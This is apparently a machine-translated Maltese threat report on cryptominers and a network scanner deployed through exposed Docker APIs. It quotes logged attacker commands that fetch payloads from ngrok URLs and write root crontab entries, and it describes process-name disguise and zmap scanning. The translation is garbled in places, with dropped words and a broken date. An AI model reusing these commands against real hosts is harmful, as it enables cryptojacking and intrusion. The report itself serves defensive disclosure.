Aħna analizzajna d-dejta miġbura bl-użu ta’ kontenituri ta’ honeypot, li ħloqna biex intraċċaw it-theddid. U skoprejna attività sinifikanti minn minaturi tal-kripto-munita mhux mixtieqa jew mhux awtorizzati skjerati bħala kontenituri diżonesti bl-użu ta 'immaġni ppubblikata mill-komunità fuq Docker Hub. L-immaġni tintuża bħala parti minn servizz li jagħti minaturi malizzjużi tal-kripto-munita.
Barra minn hekk, programmi biex jaħdmu man-netwerks huma installati biex jippenetraw kontenituri u applikazzjonijiet ġirien miftuħa.
Aħna nħallu l-honeypots tagħna kif inhu, jiġifieri, b'settings default, mingħajr ebda miżuri ta 'sigurtà jew installazzjoni sussegwenti ta' softwer addizzjonali. Jekk jogħġbok innota li Docker għandu rakkomandazzjonijiet għal setup inizjali biex jiġu evitati żbalji u vulnerabbiltajiet sempliċi. Iżda l-honeypots użati huma kontenituri, iddisinjati biex jiskopru attakki mmirati lejn il-pjattaforma tal-kontejners, mhux l-applikazzjonijiet ġewwa l-kontenituri.
L-attività malizzjuża misjuba hija wkoll notevoli għaliex ma teħtieġx vulnerabbiltajiet u hija wkoll indipendenti mill-verżjoni Docker. Is-sejba ta' immaġni ta' kontenitur ikkonfigurat ħażin, u għalhekk miftuħ, huwa dak kollu li l-attakkanti jeħtieġu biex jinfettaw ħafna servers miftuħa.
L-API Docker mhux magħluqa tippermetti lill-utent iwettaq firxa wiesgħa ta ' , inkluż il-ksib ta' lista ta' kontenituri li qed jaħdmu, il-ksib ta' zkuk minn kontenitur speċifiku, il-bidu, il-waqfien (inkluż sfurzat) u anke l-ħolqien ta' kontenitur ġdid minn immaġni speċifika b'settings speċifikati.
Fuq ix-xellug hemm il-metodu tal-kunsinna tal-malware. Fuq il-lemin hemm l-ambjent tal-attakkant, li jippermetti l-irrumblar mill-bogħod tal-immaġini.
Distribuzzjoni skond il-pajjiż ta' 3762 Docker APIs miftuħa. Ibbażat fuq tfittxija Shodan datata 12.02.2019/XNUMX/XNUMX
Katina ta 'attakk u għażliet ta' payload
Attività malizzjuża nstabet mhux biss bl-għajnuna ta 'honeypots. Dejta minn Shodan turi li n-numru ta 'Docker APIs esposti (ara t-tieni graff) żdied minn meta investigajna kontenitur ikkonfigurat ħażin użat bħala pont biex jintuża softwer tal-minjieri tal-kripto-munita Monero. F'Ottubru tas-sena l-oħra (2018, data kurrenti madwar. traduttur) kien hemm biss 856 API miftuħa.
Eżami taz-zkuk tal-honeypot wera li l-użu tal-immaġni tal-kontenitur kien assoċjat ukoll mal-użu ta , għodda biex jiġu stabbiliti konnessjonijiet sikuri jew trażmissjoni tat-traffiku minn punti aċċessibbli pubblikament għal indirizzi jew riżorsi speċifikati (per eżempju localhost). Dan jippermetti lill-attakkanti joħolqu URLs b'mod dinamiku meta jikkunsinnaw it-tagħbija fuq server miftuħ. Hawn taħt hawn eżempji ta’ kodiċi mir-reġistri li juru abbuż tas-servizz ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Kif tistgħu taraw, il-fajls li jittellgħu jitniżżlu minn URLs li jinbidlu kontinwament. Dawn l-URLs għandhom data ta' skadenza qasira, għalhekk it-tagħbija ma tistax titniżżel wara d-data ta' skadenza.
Hemm żewġ għażliet ta 'tagħbija. L-ewwel huwa minatur ELF miġbur għal Linux (definit bħala Coinminer.SH.MALXMR.ATNO) li jgħaqqad mal-pool tal-minjieri. It-tieni huwa skript (TrojanSpy.SH.ZNETMAP.A) iddisinjat biex jikseb ċerti għodod tan-netwerk użati biex jiġu skennjati firxiet tan-netwerk u mbagħad ifittxu miri ġodda.
L-iskrittura dropper tissettja żewġ varjabbli, li mbagħad jintużaw biex jużaw il-minatur tal-kripto-munita. Il-varjabbli HOST fiha l-URL fejn jinsabu l-fajls malizzjużi, u l-varjabbli RIP hija l-isem tal-fajl (fil-fatt, il-hash) tal-minatur li għandu jiġi skjerat. Il-varjabbli HOST tinbidel kull darba li tinbidel il-varjabbli hash. L-iskrittura tipprova wkoll tivverifika li l-ebda minatur ieħor tal-kripto-munita ma jkun qed jaħdem fuq is-server attakkat.
Eżempji ta' varjabbli HOST u RIP, kif ukoll snippet ta' kodiċi użat biex jiċċekkja li l-ebda minatur ieħor ma jkun qed jaħdem
Qabel ma jibda l-minatur, jingħata isem ġdid għal nginx. Verżjonijiet oħra ta 'dan l-iskritt isem ġdid lill-minatur għal servizzi leġittimi oħra li jistgħu jkunu preżenti f'ambjenti Linux. Dan normalment ikun biżżejjed biex tevita l-kontrolli mal-lista ta 'proċessi li qed jaħdmu.
L-iskrittura tat-tfittxija għandha wkoll karatteristiċi. Jaħdem bl-istess servizz URL biex juża l-għodda meħtieġa. Fosthom hemm il-binarju zmap, li jintuża biex jiskennja n-netwerks u jikseb lista ta 'portijiet miftuħa. L-iskript jgħabbi wkoll binarju ieħor li jintuża biex jinteraġixxi mas-servizzi misjuba u jirċievi banners minnhom biex jiddetermina informazzjoni addizzjonali dwar is-servizz misjub (per eżempju, il-verżjoni tiegħu).
L-iskrittura tiddetermina wkoll minn qabel xi firxiet tan-netwerk biex jiġu skennjati, iżda dan jiddependi fuq il-verżjoni tal-iskrittura. Jissettja wkoll il-portijiet fil-mira mis-servizzi—f'dan il-każ, Docker—qabel ma jmexxi l-iskan.
Hekk kif jinstabu miri possibbli, banners jitneħħew awtomatikament minnhom. L-iskript jiffiltra wkoll miri skont is-servizzi, l-applikazzjonijiet, il-komponenti jew il-pjattaformi ta’ interess: Redis, Jenkins, Drupal, MODX, , klijent Docker 1.16 u Apache CouchDB. Jekk is-server skannjat jaqbel ma' xi wieħed minnhom, jiġi ffrankat f'fajl ta' test, li l-attakkanti jistgħu jużaw aktar tard għal analiżi u hacking sussegwenti. Dawn il-fajls tat-test jittellgħu fuq is-servers tal-attakkanti permezz ta' links dinamiċi. Jiġifieri, tintuża URL separata għal kull fajl, li jfisser li l-aċċess sussegwenti huwa diffiċli.
Il-vettur tal-attakk huwa immaġni Docker, kif jidher fiż-żewġ biċċiet ta 'kodiċi li jmiss.
Fin-naħa ta’ fuq qed tismija mill-ġdid għal servizz leġittimu, u fin-naħa t’isfel hemm kif zmap jintuża biex jiskennja n-netwerks
Fuq nett hemm firxiet tan-netwerk definiti minn qabel, fin-naħa t'isfel hemm portijiet speċifiċi għat-tiftix għal servizzi, inkluż Docker
Il-screenshot turi li l-immaġni alpine-curl ġiet imniżżla aktar minn 10 miljun darba
Ibbażat fuq Alpine Linux u curl, għodda CLI effiċjenti fir-riżorsi għat-trasferiment ta 'fajls fuq diversi protokolli, tista' tibni . Kif tistgħu taraw fl-immaġni ta 'qabel, din l-immaġni diġà ġiet imniżżla aktar minn 10 miljun darba. Numru kbir ta' tniżżil jista' jfisser l-użu ta' din l-immaġni bħala punt ta' dħul din l-immaġni ġiet aġġornata aktar minn sitt xhur ilu l-utenti ma niżżlux immaġini oħra minn dan ir-repożitorju; F'Docker - sett ta 'struzzjonijiet użati biex jiġi kkonfigurat kontenitur biex iħaddem. Jekk is-settings tal-punt tad-dħul mhumiex korretti (pereżempju, il-kontenitur jitħalla miftuħ mill-Internet), l-immaġni tista 'tintuża bħala vettur tal-attakk. L-attakkanti jistgħu jużawha biex iwasslu tagħbija jekk isibu kontenitur ikkonfigurat ħażin jew miftuħ li jitħalla mhux appoġġjat.
Huwa importanti li wieħed jinnota li din l-immaġni (alpine-curl) nnifisha mhix malizzjuża, iżda kif tista 'tara hawn fuq, tista' tintuża biex twettaq funzjonijiet malizzjużi. Immaġini Docker simili jistgħu jintużaw ukoll biex iwettqu attivitajiet malizzjużi. Ikkuntattjana lil Docker u ħdimna magħhom fuq din il-kwistjoni.
Rakkomandazzjonijiet
jibqa ' għal ħafna kumpaniji, speċjalment dawk li qed jimplimentaw , iffukat fuq żvilupp u twassil rapidu. Kollox huwa aggravat mill-ħtieġa li jkun hemm konformità mar-regoli tal-awditjar u l-monitoraġġ, il-ħtieġa li tiġi mmonitorjata l-kunfidenzjalità tad-dejta, kif ukoll il-ħsara enormi min-nuqqas ta 'konformità tagħhom. L-inkorporazzjoni tal-awtomazzjoni tas-sigurtà fiċ-ċiklu tal-ħajja tal-iżvilupp mhux biss tgħinek issib toqob tas-sigurtà li inkella jistgħu ma jiġux skoperti, iżda jgħinek ukoll tnaqqas il-piż tax-xogħol bla bżonn, bħalma hija t-tħaddim ta' bini ta' softwer addizzjonali għal kull vulnerabbiltà skoperta jew konfigurazzjoni ħażina wara li applikazzjoni tiġi skjerata.
L-inċident diskuss f'dan l-artikolu jenfasizza l-ħtieġa li titqies is-sikurezza mill-bidu, inklużi r-rakkomandazzjonijiet li ġejjin:
- Għall-amministraturi tas-sistema u l-iżviluppaturi: Dejjem iċċekkja s-settings tal-API tiegħek biex tiżgura li kollox huwa kkonfigurat biex jaċċetta biss talbiet minn server speċifiku jew netwerk intern.
- Segwi l-prinċipju tal-inqas drittijiet: żgura li l-immaġini tal-kontejners jiġu ffirmati u vverifikati, tillimita l-aċċess għal komponenti kritiċi (servizz ta’ tnedija tal-kontejners) u żid il-kriptaġġ mal-konnessjonijiet tan-netwerk.
- Segwi u jippermettu mekkaniżmi ta’ sigurtà, eż. u built-in .
- Uża skannjar awtomatizzat ta 'runtimes u immaġini biex tikseb informazzjoni addizzjonali dwar il-proċessi li jaħdmu fil-kontenitur (pereżempju, biex tiskopri spoofing jew tfittex vulnerabbiltajiet). Il-kontroll tal-applikazzjoni u l-monitoraġġ tal-integrità jgħinu jsegwu bidliet anormali fis-servers, il-fajls u l-oqsma tas-sistema.
Trendmicro jgħin lit-timijiet tad-DevOps jibnu b'mod sigur, jibdew malajr, u jniedu kullimkien. Trend Micro Jipprovdi sigurtà b'saħħitha, ssimplifikata u awtomatizzata fil-pipeline DevOps ta' organizzazzjoni u tipprovdi diversi difiżi kontra t-theddid biex tipproteġi l-piżijiet tax-xogħol fiżiċi, virtwali u tas-sħab waqt ir-runtime. Iżżid ukoll is-sigurtà tal-kontejners bil и , li jiskannjaw l-immaġini tal-kontejners Docker għal malware u vulnerabbiltajiet fi kwalunkwe punt fil-pipeline tal-iżvilupp biex jipprevjenu theddid qabel ma jiġu skjerati.
Sinjali ta' kompromess
Hashes relatati:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Fuq Kelliema li jipprattikaw juru liema settings iridu jsiru l-ewwel sabiex tiġi minimizzata l-probabbiltà jew tiġi evitata kompletament l-okkorrenza tas-sitwazzjoni deskritta hawn fuq. U fid-19-21 ta’ Awwissu f’attività intensiva onlajn Tista' tiddiskuti dawn u problemi ta' sigurtà simili ma' kollegi u għalliema prattikanti f'round table, fejn kulħadd jista' jitkellem u jisma' l-uġigħ u s-suċċessi ta' kollegi ta' esperjenza.
Sors: www.habr.com